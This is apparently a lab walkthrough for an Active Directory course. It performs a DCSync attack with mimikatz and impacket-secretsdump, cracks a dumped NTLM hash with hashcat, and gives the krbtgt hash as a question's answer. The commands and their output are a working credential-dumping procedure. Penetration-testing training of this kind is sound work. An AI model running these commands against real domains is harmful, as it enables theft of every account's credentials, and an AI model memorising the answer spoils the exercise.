Topics: Domain Controller Synchronization
Questions 1
Follow the steps outlined in this section to perform the dcsync attack to obtain the NTLM hash of the krbtgt account. Enter the NTLM hash as answer to this question.
# Answer
1693c6cefafffc7af11ef34d1c788f47

# In production environments, domains typically rely on more than one domain controller to provide redundancy. The Directory Replication Service (DRS) Remote Protocol1 uses replication2 to synchronize these redundant domain controllers. A domain controller may request an update for a specific object, like an account, using the IDL_DRSGetNCChanges3 API.

# Luckily for us, the domain controller receiving a request for an update does not check whether the request came from a known domain controller. Instead, it only verifies that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user with certain rights it will succeed.

# To launch such a replication, a user needs to have the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.

# If we obtain access to a user account in one of these groups or with these rights assigned, we can perform a dcsync4 attack in which we impersonate a domain controller. This allows us to request any user credentials from the domain.

# To perform this attack, we'll use Mimikatz on a domain-joined Windows machine, and impacket-secretsdump5 on our non-domain joined Kali machine for the examples of this section.

xfreerdp /cert-ignore /u:jeffadmin /d:corp.com /p:BrouhahaTungPerorateBroom2023! /v:192.168.221.75

PS C:\Tools> .\mimikatz.exe

mimikatz # lsadump::dcsync /user:corp\dave
...
** SAM ACCOUNT **
SAM Username         : dave
Credentials:
  Hash NTLM: 08d7a47a6f9f66b97b1bae4178747494
    ntlm- 0: 08d7a47a6f9f66b97b1bae4178747494
    ntlm- 1: a11e808659d5ec5b6c4f43c1e5a0972d
    lm  - 0: 45bc7d437911303a42e764eaf8fda43e
    lm  - 1: fdd7d20efbcaf626bd2ccedd49d9512d
...

# Now, let's copy the NTLM hash and store it in a file named hashes.dcsync on our Kali system. We can then crack the hash using Hashcat as we learned in the Password Attacks Module. We'll enter 1000 as mode, rockyou.txt as wordlist, and best64.rule as rule file. Additionally, we will enter the file containing the NTLM hash and --force, since we run Hashcat in a VM.

hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1          
Session..........: hashcat
Status...........: Cracked
...

# We can now obtain the NTLM hash of any domain user account of the domain corp.com. Furthermore, we can attempt to crack these hashes and retrieve the plaintext passwords of these accounts.

# Notably, we can perform the dcsync attack to obtain any user password hash in the domain, even the domain administrator Administrator.

mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...

# Perform the dcsync attack from Linux as well. We'll use impacket-secretsdump to acheive this. To launch it, we'll enter the target username dave as an argument for -just-dc-user and provide the credentials of a user with the required rights, as well as the IP of the domain controller in the format domain/user:password@ip.
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.221.70
...
[*] Using the DRSUAPI method to get NTDS.DIT secrets
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
...

# Above shows that we successfully obtained the NTLM hash of dave. The output of the tool states that it uses DRSUAPI,6 the Microsoft API implementing the Directory Replication Service Remote Protocol.

# The dcsync attack is a powerful technique to obtain any domain user credentials. As a bonus, we can use it from both Windows and Linux. By impersonating a domain controller, we can use replication to obtain user credentials from a domain controller. However, to perform this attack, we need a user that is a member of Domain Admins, Enterprise Admins, or Administrators, because there are certain rights required to start the replication. Alternatively, we can leverage a user with these rights assigned, though we're far less likely to encounter one of these in a real penetration test.

# Back to the questions
mimikatz # lsadump::dcsync /user:corp\krbtgt
...
Credentials:
  Hash NTLM: 1693c6cefafffc7af11ef34d1c788f47
...


